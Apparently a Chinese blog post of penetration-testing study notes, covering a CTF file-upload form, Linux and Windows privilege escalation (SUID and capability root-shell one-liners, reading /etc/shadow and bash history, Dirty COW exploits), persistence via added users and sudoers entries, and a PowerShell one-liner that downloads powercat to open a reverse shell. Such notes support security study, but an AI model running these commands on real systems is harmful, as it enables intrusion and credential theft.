

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="chaye">
  <meta name="keywords" content="">
  
    <meta name="description" content="shell代码上传123456789101112131415161718192021222324252627282930&lt;!DOCTYPE html&gt;date: 2023-05-30 16:10:11&lt;html lang&#x3D;&quot;en&quot;&gt;&lt;head&gt;&lt;meta charset&#x3D;&quot;UTF-8&quot;&gt;&lt;meta htt">
<meta property="og:type" content="article">
<meta property="og:title" content="渗透入门">
<meta property="og:url" content="http://example.com/2025/01/21/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/index.html">
<meta property="og:site_name" content="chaye的博客">
<meta property="og:description" content="shell代码上传123456789101112131415161718192021222324252627282930&lt;!DOCTYPE html&gt;date: 2023-05-30 16:10:11&lt;html lang&#x3D;&quot;en&quot;&gt;&lt;head&gt;&lt;meta charset&#x3D;&quot;UTF-8&quot;&gt;&lt;meta htt">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/42988179/1741499482710-3a53ba34-98de-4cef-865b-d86c085ae606.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/42988179/1741499482922-1c3f60a0-2aad-46b1-b4a1-32441ef9b50a.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/42988179/1741499483091-c92ae9d8-05d5-4ba6-a51b-2750b5202ef7.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/42988179/1741499483257-8a6842bc-2954-46ca-ab01-ed8ab59ee1a8.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/42988179/1741499483426-ac77b13a-be40-4aa1-a213-556857ea667b.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/42988179/1741499483585-c2bf641b-c755-4bd7-818b-2424c644f975.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/42988179/1741499483742-4d66f526-aa1d-4198-be64-b0bfa07aac32.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/42988179/1741499483915-bec315df-06bf-4e8f-a322-22b0c30a8714.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/42988179/1741499484115-ed238339-1d1a-42cc-9c6a-192266447dd5.png">
<meta property="article:published_time" content="2025-01-21T11:37:34.000Z">
<meta property="article:modified_time" content="2025-03-29T07:38:17.791Z">
<meta property="article:author" content="chaye">
<meta property="article:tag" content="渗透测试">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2025/png/42988179/1741499482710-3a53ba34-98de-4cef-865b-d86c085ae606.png">
  
  
  
  <title>渗透入门 - chaye的博客</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>chaye</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="渗透入门"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-01-21 19:37" pubdate>
          January 21, 2025 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.1k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          35 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">渗透入门</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="shell代码上传"><a href="#shell代码上传" class="headerlink" title="shell代码上传"></a>shell代码上传</h1><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">html</span>&gt;</span><br>date: 2023-05-30 16:10:11<br><br><span class="hljs-tag">&lt;<span class="hljs-name">html</span> <span class="hljs-attr">lang</span>=<span class="hljs-string">&quot;en&quot;</span>&gt;</span><br><br><span class="hljs-tag">&lt;<span class="hljs-name">head</span>&gt;</span><br><br><span class="hljs-tag">&lt;<span class="hljs-name">meta</span> <span class="hljs-attr">charset</span>=<span class="hljs-string">&quot;UTF-8&quot;</span>&gt;</span><br><br><span class="hljs-tag">&lt;<span class="hljs-name">meta</span> <span class="hljs-attr">http-equiv</span>=<span class="hljs-string">&quot;X-UA-Compatible&quot;</span> <span class="hljs-attr">content</span>=<span class="hljs-string">&quot;IE=edge&quot;</span>&gt;</span><br><br><span class="hljs-tag">&lt;<span class="hljs-name">meta</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&quot;viewport&quot;</span> <span class="hljs-attr">content</span>=<span class="hljs-string">&quot;width=device-width, initial-scale=1.0&quot;</span>&gt;</span><br><br><span class="hljs-tag">&lt;<span class="hljs-name">title</span>&gt;</span>Document<span class="hljs-tag">&lt;/<span class="hljs-name">title</span>&gt;</span><br><br><span class="hljs-tag">&lt;/<span class="hljs-name">head</span>&gt;</span><br><br><span class="hljs-tag">&lt;<span class="hljs-name">body</span>&gt;</span><br><br><span class="hljs-tag">&lt;<span class="hljs-name">form</span> <span class="hljs-attr">action</span>=<span class="hljs-string">&quot;http://题目/api.php?m=upload&amp;a=upfile&amp;adminid=&amp;device=1625923765752&amp;cfrom=mweb&amp;token=&amp;sysmodenum=officia&amp;sysmid=0&amp;maxsize=2&quot;</span> <span class="hljs-attr">method</span>=<span class="hljs-string">&quot;post&quot;</span> <span class="hljs-attr">enctype</span>=<span class="hljs-string">&quot;multipart/form-data&quot;</span>&gt;</span><br><br><span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;file&quot;</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&quot;file&quot;</span>&gt;</span><br><br><span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;submit&quot;</span>&gt;</span><br><br><span class="hljs-tag">&lt;/<span class="hljs-name">form</span>&gt;</span><br><br><span class="hljs-tag">&lt;/<span class="hljs-name">body</span>&gt;</span><br><br><span class="hljs-tag">&lt;/<span class="hljs-name">html</span>&gt;</span><br></code></pre></td></tr></table></figure>


<h1 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h1><p>[TOC]</p>
<h1 id="linux"><a href="#linux" class="headerlink" title="linux"></a>linux</h1><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>内核设备信息：</p>
<p>uname -a 打印所有可用的系统信息</p>
<p>uname -r 内核版本</p>
<p>uname -n 系统主机名。</p>
<p>uname -m 查看系统内核架构（64位&#x2F;32位）</p>
<p>hostname 系统主机名</p>
<p>cat &#x2F;proc&#x2F;version 内核信息 cat &#x2F;etc&#x2F;*-release 分发信息 cat &#x2F;etc&#x2F;issue 分发信息</p>
<p>cat &#x2F;proc&#x2F;cpuinfo CPU信息用户和群组信息：</p>
<p>cat &#x2F;etc&#x2F;passwd 列出系统上的所有用户</p>
<p>cat &#x2F;etc&#x2F;group 列出系统上的所有组</p>
<p>grep -v -E “^#” &#x2F;etc&#x2F;passwd | awk -F: ‘$3 &#x3D;&#x3D; 0 { print $1}’ 列出所有的超级用户账户</p>
<p>whoami 查看当前用户</p>
<p>w 谁目前已登录，他们正在做什么</p>
<p>last 最后登录用户的列表</p>
<p>lastlog 所有用户上次登录的信息</p>
<p>lastlog -u %username% 有关指定用户上次登录的信息</p>
<p>lastlog |grep -v “Never” 以前登录用户的信息</p>
<p>history</p>
<p>cat &#x2F;home&#x2F;<user>&#x2F;.bash_history</p>
<p>cat ~&#x2F;.bash_history | grep -i passw</p>
<p>用户和权限信息：</p>
<p>whoami 当前用户名</p>
<p>id 当前用户信息</p>
<p>cat &#x2F;etc&#x2F;sudoers 谁被允许以root身份执行 sudo -l 当前用户可以以root身份执行操作 环境系统变量信息：</p>
<p>env 显示环境变量</p>
<p>set 现实环境变量</p>
<p>echo %PATH 路径信息</p>
<p>history 显示当前用户的历史命令记录</p>
<p>pwd 输出工作目录</p>
<p>cat &#x2F;etc&#x2F;profile 显示默认系统变量</p>
<p>cat &#x2F;etc&#x2F;shells 显示可用的shell</p>
<h2 id="hashdump"><a href="#hashdump" class="headerlink" title="hashdump"></a>hashdump</h2><p><a target="_blank" rel="noopener" href="https://github.com/huntergregal/mimipenguin">https://github.com/huntergregal/mimipenguin</a></p>
<p>转储hash，有可能获得铭文密码。</p>
<h2 id="suid"><a href="#suid" class="headerlink" title="suid"></a>suid</h2><h3 id="探测"><a href="#探测" class="headerlink" title="探测"></a>探测</h3><p>find &#x2F; -user root -perm -4000 -print 2&gt;&#x2F;dev&#x2F;null find &#x2F; -perm -u&#x3D;s -type f 2&gt;&#x2F;dev&#x2F;null</p>
<p>find &#x2F; -user root -perm -4000 -exec ls -ldb {} ;</p>
<p>常见的可以提权的程序:</p>
<p>nmap vim find Bash More Less Nano cp netcat</p>
<h3 id="利用方式"><a href="#利用方式" class="headerlink" title="利用方式"></a>利用方式</h3><p>linux： <a target="_blank" rel="noopener" href="https://gtfobins.github.io/">https://gtfobins.github.io/</a></p>
<p>windows：</p>
<p><a target="_blank" rel="noopener" href="https://lolbas-project.github.io/">https://lolbas-project.github.io/</a></p>
<p><strong>修改PATH</strong></p>
<p>假如有以下suid程序：</p>
<p>system(“cat &#x2F;flag”);</p>
<p>可以修改PATH来让root运行我们的cat。</p>
<p>export PATH&#x3D;&#x2F;tmp &amp;&amp; &#x2F;exp</p>
<p>&#x2F;tmp&#x2F;cat中为恶意程序</p>
<h2 id="sudo"><a href="#sudo" class="headerlink" title="sudo"></a>sudo</h2><h3 id="探测-1"><a href="#探测-1" class="headerlink" title="探测"></a>探测</h3><p>Linux系统中可以使用sudo执行一个只有root才能执行的命令，配置文件保存在&#x2F;etc&#x2F;sudoers，sudo -l可以列出当前用户支持sudo的命令。</p>
<h2 id="cap"><a href="#cap" class="headerlink" title="cap"></a>cap</h2><p>我们运行SUID的命令时，通常只是需要使用一小部分特权，但是使用SUID，却可以拥有root用户的全部权限。所以，一旦SUID的文件存在漏洞，便可能被利用，以root身份执行其他操作。</p>
<p>SUID的问题，主要在于权限控制太粗糙。为了对root身份进行更加精细的控制，Linux增加了另一种机制，即 capabilities。</p>
<h3 id="探测-2"><a href="#探测-2" class="headerlink" title="探测"></a>探测</h3><p>getcap -r &#x2F; 2&gt;&#x2F;dev&#x2F;null</p>
<p>利用</p>
<p><strong>gdb</strong></p>
<p>gdb -nx -ex ‘python import os; os.setuid(0)’ -ex ‘!sh’ -ex quit</p>
<p><strong>perl</strong></p>
<p>perl -e ‘use POSIX qw(setuid); POSIX::setuid(0); exec “&#x2F;bin&#x2F;sh”;’</p>
<p><strong>php</strong></p>
<p>php -r “posix_setuid(0); system(‘&#x2F;bin&#x2F;sh’);”</p>
<p><strong>python</strong></p>
<p>python -c ‘import os; os.setuid(0); os.system(“&#x2F;bin&#x2F;sh”)’</p>
<p><strong>ruby</strong></p>
<p>ruby -e ‘Process::Sys.setuid(0); exec “&#x2F;bin&#x2F;sh”‘</p>
<p><strong>rvim</strong></p>
<p>rvim -c ‘:py import os; os.setuid(0); os.execl(“&#x2F;bin&#x2F;sh”, “sh”, “-c”, “reset; exec sh”)’</p>
<p><strong>vim</strong></p>
<p>vim -c ‘:py import os; os.setuid(0); os.execl(“&#x2F;bin&#x2F;sh”, “sh”, “-c”, “reset; exec sh”)’</p>
<p><strong>tar</strong> cap_dac_read_search可以绕过文件的读权限检查以及目录的读&#x2F;执行权限的检查，利用此特性我们可以读取系统中的敏感信息。</p>
<p>tar -vcf root.tar &#x2F;root</p>
<p><strong>openssl</strong> 建立http服务器，通过http越权下载文件</p>
<h1 id="使用openssl生成证书"><a href="#使用openssl生成证书" class="headerlink" title="使用openssl生成证书"></a>使用openssl生成证书</h1><p>┌──(kali㉿kali)-[&#x2F;]</p>
<p>└─$ openssl req -x509 -newkey rsa:2048 -keyout &#x2F;tmp&#x2F;key.pem -out &#x2F;tmp&#x2F;cert.pem - days 365 -nodes</p>
<h1 id="进入系统根目录下"><a href="#进入系统根目录下" class="headerlink" title="进入系统根目录下"></a>进入系统根目录下</h1><p>┌──(kali㉿kali)-[&#x2F;]</p>
<p>└─$ cd &#x2F;</p>
<h1 id="启动web服务器，监听8080端口"><a href="#启动web服务器，监听8080端口" class="headerlink" title="启动web服务器，监听8080端口"></a>启动web服务器，监听8080端口</h1><p>┌──(kali㉿kali)-[&#x2F;]</p>
<p>└─$ openssl s_server -key &#x2F;tmp&#x2F;key.pem -cert &#x2F;tmp&#x2F;cert.pem -port 8080 -HTTP</p>
<h1 id="访问本机的web服务，读取-etc-shadow文件"><a href="#访问本机的web服务，读取-etc-shadow文件" class="headerlink" title="访问本机的web服务，读取&#x2F;etc&#x2F;shadow文件"></a>访问本机的web服务，读取&#x2F;etc&#x2F;shadow文件</h1><p>┌──(kali㉿kali)-[~]</p>
<p>└─$ curl –http0.9 -k “<a target="_blank" rel="noopener" href="https://127.0.0.1:8080/etc/shadow">https://127.0.0.1:8080/etc/shadow</a>“ root:!:18681:0:99999:7:::</p>
<p>daemon:<em>:18681:0:99999:7::: bin:</em>:18681:0:99999:7:::</p>
<p>sys:*:18681:0:99999:7:::</p>
<p>sync:*:18681:0:99999:7:::</p>
<h2 id="内核漏洞"><a href="#内核漏洞" class="headerlink" title="内核漏洞"></a>内核漏洞</h2><h3 id="探测-3"><a href="#探测-3" class="headerlink" title="探测"></a>探测</h3><p><strong>linux-exploit-suggester</strong></p>
<p>详见工具.md</p>
<h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h3><p><strong>Linux</strong></p>
<p>常见漏洞详见tools&#x2F;linux-kernel-exploits</p>
<p>大部分exp需要自己编译。使用docker的交叉编译环境(<a target="_blank" rel="noopener" href="https://github.com/dockcross/dockcross">https://github.com/dockcross/dockcross</a>)</p>
<p><strong>dirty cow</strong></p>
<p><a target="_blank" rel="noopener" href="https://dirtycow.ninja/">https://dirtycow.ninja/</a> 交叉编译.受影响版本：</p>
<p>Centos7&#x2F;RHEL7</p>
<p>Cetnos6&#x2F;RHEL6 Ubuntu 16.10</p>
<p>Ubuntu 16.04</p>
<p>Ubuntu 14.04</p>
<p>Debian 8</p>
<p>Debian 7</p>
<p>3.10.0-327.36.3.el7</p>
<p>2.6.32-642.6.2.el6</p>
<p>4.8.0-26.28</p>
<p>4.4.0-45.66</p>
<p>3.13.0-100.147</p>
<p>3.16.36-1+deb8u2</p>
<p>3.2.82-1</p>
<table>
<thead>
<tr>
<th></th>
<th></th>
<th></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td><strong>Link</strong></td>
<td><strong>Usage</strong></td>
<td><strong>Description</strong></td>
<td><strong>Family</strong></td>
</tr>
<tr>
<td>dirtyc0w.c</td>
<td>.&#x2F;dirtyc0w file content</td>
<td>Read-only write</td>
<td>&#x2F;proc&#x2F;self&#x2F;mem</td>
</tr>
<tr>
<td>cowroot.c</td>
<td>.&#x2F;cowroot</td>
<td>SUID-based root</td>
<td>&#x2F;proc&#x2F;self&#x2F;mem</td>
</tr>
</tbody></table>
<p>dirtycow- mem.c</p>
<p>.&#x2F;dirtycow-mem libc-based root &#x2F;proc&#x2F;self&#x2F;mem</p>
<p>pokemon.c .&#x2F;d file content Read-only write PTRACE_POKEDATA dirtyc0w.c .&#x2F;dirtycow file content Read-only write (Android) &#x2F;proc&#x2F;self&#x2F;mem</p>
<table>
<thead>
<tr>
<th></th>
<th></th>
<th></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>dirtycow.rb</td>
<td>use exploit&#x2F;linux&#x2F;local&#x2F;dirtycow and run</td>
<td>SUID-based root</td>
<td>&#x2F;proc&#x2F;self&#x2F;mem</td>
</tr>
<tr>
<td>0xdeadbeef.c</td>
<td>.&#x2F;0xdeadbeef</td>
<td>vDSO-based root</td>
<td>PTRACE_POKEDATA</td>
</tr>
<tr>
<td>naughtyc0w.c</td>
<td>.&#x2F;c0w suid</td>
<td>SUID-based root</td>
<td>&#x2F;proc&#x2F;self&#x2F;mem</td>
</tr>
<tr>
<td>c0w.c</td>
<td>.&#x2F;c0w</td>
<td>SUID-based root</td>
<td>PTRACE_POKEDATA</td>
</tr>
</tbody></table>
<p>mucow.c .&#x2F;mucow destination &lt; payload.exe Read-only write (multi</p>
<p>page)</p>
<p>PTRACE_POKEDATA</p>
<p>dcow.cpp .&#x2F;dcow &#x2F;etc&#x2F;passwd based root &#x2F;proc&#x2F;self&#x2F;mem</p>
<p>dirtyc0w.go go run dirtyc0w.go -f&#x3D;file - c&#x3D;content</p>
<p>Read-only write &#x2F;proc&#x2F;self&#x2F;mem</p>
<p>dirty.c .&#x2F;dirty &#x2F;etc&#x2F;passwd based root PTRACE_POKEDATA</p>
<p><strong>Windows</strong></p>
<p><a target="_blank" rel="noopener" href="https://github.com/SecWiki/windows-kernel-exploits">https://github.com/SecWiki/windows-kernel-exploits</a></p>
<h2 id="计划任务"><a href="#计划任务" class="headerlink" title="计划任务"></a>计划任务</h2><h3 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h3><p><img src="https://cdn.nlark.com/yuque/0/2025/png/42988179/1741499482710-3a53ba34-98de-4cef-865b-d86c085ae606.png" srcset="/img/loading.gif" lazyload> &#x2F;var&#x2F;spool&#x2F;cron&#x2F; 目录下存放的是每个用户包括root的crontab任务，每个任务以创建者的名字命名</p>
<p><img src="https://cdn.nlark.com/yuque/0/2025/png/42988179/1741499482922-1c3f60a0-2aad-46b1-b4a1-32441ef9b50a.png" srcset="/img/loading.gif" lazyload> &#x2F;etc&#x2F;crontab 这个文件负责调度各种管理和维护任务。</p>
<p><img src="https://cdn.nlark.com/yuque/0/2025/png/42988179/1741499483091-c92ae9d8-05d5-4ba6-a51b-2750b5202ef7.png" srcset="/img/loading.gif" lazyload> &#x2F;etc&#x2F;cron.d&#x2F; 这个目录用来存放任何要执行的crontab文件或脚本。 <img src="https://cdn.nlark.com/yuque/0/2025/png/42988179/1741499483257-8a6842bc-2954-46ca-ab01-ed8ab59ee1a8.png" srcset="/img/loading.gif" lazyload> 我们还可以把脚本放</p>
<p>在&#x2F;etc&#x2F;cron.hourly、&#x2F;etc&#x2F;cron.daily、&#x2F;etc&#x2F;cron.weekly、&#x2F;etc&#x2F;cron.monthly目录中，让它每小时&#x2F;天&#x2F;星期、月执行一次。</p>
<ul>
<li><ul>
<li><ul>
<li><ul>
<li><ul>
<li>user Command #每分钟 #分、时、日、月、周</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="软连接"><a href="#软连接" class="headerlink" title="软连接"></a>软连接</h3><p>*<strong>作用</strong></p>
<p>sh中*会自动解析成当前目录下所有文件名：</p>
<p>#!&#x2F;bin&#x2F;bash echo @$;</p>
<p>.&#x2F;test.sh *</p>
<h1 id="输出当前文件夹下所有文件名"><a href="#输出当前文件夹下所有文件名" class="headerlink" title="输出当前文件夹下所有文件名"></a>输出当前文件夹下所有文件名</h1><p>可以用于参数注入，比如tar *&#x2F;cp *</p>
<h2 id="权限维持"><a href="#权限维持" class="headerlink" title="权限维持"></a>权限维持</h2><h3 id="添加用户"><a href="#添加用户" class="headerlink" title="添加用户"></a>添加用户</h3><p>useradd newuser;echo “newuser:password”|chpasswd</p>
<p>添加suoder</p>
<p>修改 &#x2F;etc&#x2F;sudoers 文件，找到下面一行，在root下面添加一行，如下所示：</p>
<p>root ALL&#x3D;(ALL) ALL</p>
<p><username> ALL&#x3D;(ALL) ALL</p>
<h1 id="windows"><a href="#windows" class="headerlink" title="windows"></a>windows</h1><p><a target="_blank" rel="noopener" href="https://github.com/SecWiki/windows-kernel-exploits">https://github.com/SecWiki/windows-kernel-exploits</a></p>
<h2 id="Runas"><a href="#Runas" class="headerlink" title="Runas"></a>Runas</h2><p>RUNAS 用法:</p>
<p>RUNAS [ [&#x2F;noprofile | &#x2F;profile] [&#x2F;env] [&#x2F;savecred | &#x2F;netonly] ] &#x2F;user:<UserName> program</p>
<p>runas &#x2F;noprofile &#x2F;user:mymachine\administrator cmd</p>
<p>说明：使用本机上的Administrator管理员身份执行CMD，&#x2F;noprofile为不加载该用户的配置信息。</p>
<p>runas &#x2F;profile &#x2F;env &#x2F;user:mydomain\admin “mmc %windir%\system32\dsa.msc”</p>
<p>说明：使用本机上的admin身份扫行msc控制台。 &#x2F;profile为指定加载用户配置文件。 &#x2F;env 表示使用当前环境。</p>
<p>runas &#x2F;env <a href="mailto:&#x75;&#115;&#x65;&#114;&#64;&#100;&#x6f;&#109;&#97;&#x69;&#110;&#46;&#x6d;&#105;&#99;&#114;&#x6f;&#x73;&#111;&#x66;&#x74;&#46;&#99;&#x6f;&#x6d;">&#x2F;user:user@domain.microsoft.com</a> “notepad \”my file.txt\””</p>
<p>说明：使用域用户身份运行，并指定使用notepad打开my file.txt文档。 RunasCs是第三方的升级工具：</p>
<p>允许显式凭证</p>
<p>无论是从交互进程还是从服务进程生成，都可以工作正确管理窗口站和桌面的DACL以创建新进程</p>
<p>使用更可靠的创建进程函数，例如CreateProcessAsUser()，CreateProcessWithTokenW()如果调用进程拥有所需的权限（自动检测）</p>
<p>允许指定登录类型，例如 8-NetworkCleartext 登录（无UAC限制）当知道管理员密码时允许绕过 UAC（标志 –bypass-uac）</p>
<p>允许创建一个主线程模拟请求用户的进程（标志–remote-impersonation）允许将stdin、stdout和stderr重定向到远程主机</p>
<p>它是开源的:)</p>
<p><a target="_blank" rel="noopener" href="https://github.com/antonioCoco/RunasCs">https://github.com/antonioCoco/RunasCs</a></p>
<p>kali&#x2F;tools&#x2F;pentest&#x2F;priv&#x2F;windows-exe&#x2F;runascs</p>
<h2 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h2><p>powershell工具： powercat.ps1</p>
<p>powershell IEX (New-Object</p>
<p>System.Net.Webclient).DownloadString(‘<a href="http://ip:port/powercat.ps1">http://ip:port/powercat.ps1</a>‘); powercat -c IP -p 端口 -e cmd</p>
<h3 id="无文件后门"><a href="#无文件后门" class="headerlink" title="无文件后门"></a>无文件后门</h3><p>memfd_create 是 Linux 中的一个系统调用，用于创建一个内存文件描述符。这个文件描述符可以用于共享内存、匿名内存映射或其他与文件无关的 I&#x2F;O 操作。</p>
<p>int memfd_create(const char *name, unsigned int flags);</p>
<p>&#x2F;&#x2F; name：一个可选的名称，用于标识这个内存文件描述符。如果设置为NULL，则使用默认名称。</p>
<p>&#x2F;&#x2F; flags：用于指定创建的内存文件描述符的特性。例如，可以使用 MFD_CLOEXEC 和</p>
<p>MFD_ALLOW_SEALING 等标志。</p>
<h2 id="内核溢出漏洞提权"><a href="#内核溢出漏洞提权" class="headerlink" title="内核溢出漏洞提权"></a>内核溢出漏洞提权</h2><h3 id="信息收集-1"><a href="#信息收集-1" class="headerlink" title="信息收集"></a>信息收集</h3><p><img src="https://cdn.nlark.com/yuque/0/2025/png/42988179/1741499483426-ac77b13a-be40-4aa1-a213-556857ea667b.png" srcset="/img/loading.gif" lazyload> msf</p>
<p>dos命令</p>
<p>post&#x2F;windows&#x2F;gather&#x2F;enum_applications 查看系统可能存在的可以利用的漏洞</p>
<p>post&#x2F;windows&#x2F;gather&#x2F;enum_patches 查找系统中的补丁信息。</p>
<p>post&#x2F;multi&#x2F;recon&#x2F;local_exploit_suggester</p>
<p>Windows Exploit Suggester</p>
<p>chcp 437 # 将语言设为英文</p>
<p>systeminfo</p>
<p>Wmic qfe get Caption,Description,HotFixID,InstalledOn # 查看windows机器上安装了多少补丁</p>
<p>schtasks &#x2F;query &#x2F;fo LIST &#x2F;v # 查看计划任务</p>
